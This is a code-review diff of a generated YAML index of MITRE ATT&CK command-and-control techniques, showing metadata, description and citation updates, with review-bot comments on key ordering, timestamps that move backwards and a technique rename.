- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090:
technique:
@@ -37767,7 +38236,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T19:16:11.648Z'
name: Proxy
description: |-
Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37787,8 +38256,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1568:
technique:
@@ -37826,7 +38293,7 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:26:23.782Z'
name: Dynamic Resolution
description: |-
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37854,42 +38321,22 @@ command-and-control:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1102:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Anastasios Pingios
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- created: '2017-05-31T21:31:13.915Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1102
- url: https://attack.mitre.org/techniques/T1102
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-07T17:53:54.380Z'
name: Web Service
description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Sarathkumar Rajendran, Microsoft Defender365
+ x_mitre_deprecated: false
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
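Review bot: most of this hunk is key reordering (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `external_references` all moved below `description`) rather than content; the substantive edits are the description (cloud services, Microsoft, the BirdyClient citation), the added contributor and the new `modified` value. Have the generator emit keys in a stable order, or sort them, so future upstream syncs produce diffs that can be reviewed line by line.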
@@ -37898,17 +38345,39 @@ command-and-control:
for uncommon data flows (e.g., a client sending significantly more data than
it receives from a server). User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created: '2017-05-31T21:31:13.915Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1102
+ external_id: T1102
+ - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+ description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+ Graph API for C&C communication. Retrieved July 1, 2024.
+ url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1568.003:
technique:
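Review bot: `x_mitre_permissions_required: - User` is dropped for T1102 here while the same field is kept for T1568 (above) and for T1205.001, T1102.003 and T1102.002 (below). If upstream removed it for this object at version 1.2 that is fine, but if the generator only drops it for objects it re-emits, the index is now inconsistent across techniques; confirm against the source bundle. The added `revoked: false` and `x_mitre_deprecated: false` defaults are the 3.2.0 object shape and are expected.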
@@ -37940,7 +38409,7 @@ command-and-control:
description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
Operations. Retrieved March 6, 2017.
url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T20:54:28.287Z'
name: DNS Calculation
description: |-
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -37957,8 +38426,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1104:
technique:
@@ -37978,7 +38445,7 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1104
external_id: T1104
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:43:38.181Z'
name: Multi-Stage Channels
description: |-
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -38001,8 +38468,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1205.001:
technique:
@@ -38027,7 +38492,7 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -38052,8 +38517,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.002:
technique:
@@ -38118,7 +38581,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1102.003:
technique:
@@ -38142,7 +38604,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:26:10.109Z'
name: One-Way Communication
description: |-
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -38167,21 +38629,36 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.003:
technique:
- modified: '2024-04-19T13:24:36.872Z'
+ modified: '2024-09-25T20:48:24.411Z'
name: 'Proxy: Multi-hop Proxy'
- description: |-
- Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
- For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
- In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
-
- Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+ description: "Adversaries may chain together multiple proxies to disguise the
+ source of malicious traffic. Typically, a defender will be able to identify
+ the last proxy traffic traversed before it enters their network; the defender
+ may or may not be able to identify any previous proxies before the last-hop
+ proxy. This technique makes identifying the original source of the malicious
+ traffic even more difficult by requiring the defender to trace malicious traffic
+ through several proxies to identify its source.\n\nFor example, adversaries
+ may construct or use onion routing networks – such as the publicly available
+ [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+ C2 traffic through a compromised population, allowing communication with any
+ device within the network.(Citation: Onion Routing) Adversaries may also use
+ operational relay box (ORB) networks composed of virtual private servers (VPS),
+ Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+ obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+ infrastructure, it is possible for an adversary to leverage multiple compromised
+ devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+ By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ on routers, adversaries can add custom code to the affected network devices
+ that will implement onion routing between those nodes. This method is dependent
+ upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+ method allowing the adversaries to cross the protected network boundary of
+ the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+ \ Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries
+ may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+ routing between a decentralized network of peers.(Citation: NGLite Trojan)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
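Review bot: the description is switched from a `|-` literal block scalar to a double-quoted folded string, which turns a one-sentence addition (the ORB sentence citing Mandiant) into a full-paragraph rewrite in the diff and introduces the `\ Protocols such as ICMP may be used as a transport.` escape for a leading space the literal block carried naturally. Prefer keeping block scalars in the generator so only the added sentence shows up. The space before `(Citation: ORB Mandiant)` is upstream text and should not be hand-edited in a generated file.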
@@ -38200,7 +38677,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -38214,6 +38691,11 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1090/003
external_id: T1090.003
+ - source_name: ORB Mandiant
+ description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+ Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+ July 8, 2024.
+ url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
- source_name: NGLite Trojan
description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -38227,12 +38709,11 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.003
atomic_tests: []
T1001:
technique:
- modified: '2024-02-02T19:04:35.389Z'
+ modified: '2024-10-07T15:07:47.232Z'
name: Data Obfuscation
description: 'Adversaries may obfuscate command and control traffic to make
it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -38282,11 +38763,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1571:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:37:57.868Z'
name: Non-Standard Port
description: |-
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -38295,20 +38775,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
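Review bot: this hunk only moves `x_mitre_deprecated`, `x_mitre_domains` and `x_mitre_is_subtechnique` above `x_mitre_platforms`; no value changes. Net-zero churn like this is the cost of an unstable key order in the generator and is what makes the real T1571 changes (the `x.com` URL and the spec bump in the next hunk) harder to spot.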
@@ -38333,17 +38813,16 @@ command-and-control:
url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
- source_name: Fortinet Agent Tesla April 2018
description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
Variant. Retrieved November 5, 2018.
url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1571
atomic_tests: []
T1573:
@@ -38399,7 +38878,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1573
atomic_tests: []
T1102.002:
@@ -38424,7 +38902,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:15:47.861Z'
name: Bidirectional Communication
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
@@ -38461,8 +38939,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1573.002:
technique:
@@ -38516,7 +38992,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1095:
technique:
@@ -38588,33 +39063,12 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1095
atomic_tests: []
T1001.003:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
- type: attack-pattern
- created: '2020-03-15T00:40:27.503Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1001.003
- url: https://attack.mitre.org/techniques/T1001/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
- name: Protocol Impersonation
+ modified: '2024-10-09T15:40:19.436Z'
+ name: Protocol or Service Impersonation
description: "Adversaries may impersonate legitimate protocols or web service
traffic to disguise command and control activity and thwart analysis efforts.
By impersonating legitimate protocols or web services, adversaries can make
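Review bot: renaming the sub-technique to `Protocol or Service Impersonation` has to be mirrored anywhere the repository keys on the technique name (the Indexes-Markdown files, the `Technique Name` column of the Indexes-CSV files, any atomic YAML `display_name`). T1001.003 has `atomic_tests: []`, so the CSVs are probably unaffected, but grep for the old name before merging. The rest of the hunk is the same key reordering seen for T1102.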
@@ -38622,23 +39076,61 @@ command-and-control:
\ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
like subsequent traffic is SSL/TLS encrypted, potentially interfering with
some security tooling, or to make the traffic look like it is related with
- a trusted entity. "
+ a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+ impersonate expected web traffic or trusted services. For example, adversaries
+ may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+ data to disguise C2 communications or mimic legitimate services such as Gmail,
+ Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+ Malleable-C2-U42)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - James Emery-Callcott, Emerging Threats Team, Proofpoint
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+ created: '2020-03-15T00:40:27.503Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1001/003
+ external_id: T1001.003
+ - source_name: Malleable-C2-U42
+ description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+ Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+ How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+ September 24, 2024.'
+ url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ - source_name: ESET Okrum July 2019
+ description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+ RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1090.004:
technique:
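Review bot: the `Malleable-C2-U42` reference description runs six author names together with no separators ("Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia Siddhart Shibiraj"); if this block mirrors upstream ATT&CK data the fix belongs upstream, but it is worth flagging so it is not mistaken for a local typo. Both new `(Citation: ESET Okrum July 2019)` and `(Citation: Malleable-C2-U42)` tags in the description are matched by `external_references` entries added in the same hunk, so no citation is left dangling, and the `x_mitre_version` bump from '1.0' to '2.0' is consistent with a description rewrite of this size.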
@@ -38685,7 +39177,6 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1132:
technique:
@@ -38745,7 +39236,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.002:
technique:
@@ -38777,7 +39267,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-14T23:39:50.117Z'
name: Non-Standard Encoding
description: 'Adversaries may encode data with a non-standard data encoding
system to make the content of command and control traffic more difficult to
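Review bot: `modified` moves backwards here for T1132.002, from '2021-04-29T14:49:39.188Z' to '2020-03-14T23:39:50.117Z'; a modification timestamp should not regress, so either the YAML was regenerated from a different upstream snapshot or the earlier value was wrong. The same backwards move appears below for T1001.002, T1008, T1102.001, T1602, T1560.003, T1114.001, T1005 and T1560.002. Please state in the PR description which ATT&CK release the data was regenerated from so these can be checked against it instead of being treated as nine separate regressions.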
@@ -38803,8 +39293,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.001:
technique:
@@ -38871,7 +39359,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.001
atomic_tests: []
T1105:
@@ -38969,7 +39456,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1105
atomic_tests: []
T1665:
@@ -39062,7 +39548,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1001.002:
technique:
@@ -39086,7 +39571,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-15T00:37:58.963Z'
name: Data Obfuscation via Steganography
description: 'Adversaries may use steganographic techniques to hide command
and control traffic to make detection efforts more difficult. Steganographic
@@ -39109,8 +39594,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1001.002
atomic_tests: []
T1008:
@@ -39135,7 +39618,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:49:47.340Z'
name: Fallback Channels
description: Adversaries may use fallback or alternate communication channels
if the primary channel is compromised or inaccessible in order to maintain
@@ -39155,8 +39638,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.001:
technique:
@@ -39210,7 +39691,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.001
atomic_tests: []
T1102.001:
@@ -39235,7 +39715,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:12:30.499Z'
name: Dead Drop Resolver
description: |-
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -39261,8 +39741,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1001.001:
technique:
@@ -39316,7 +39794,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
collection:
T1560.001:
@@ -39392,7 +39869,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
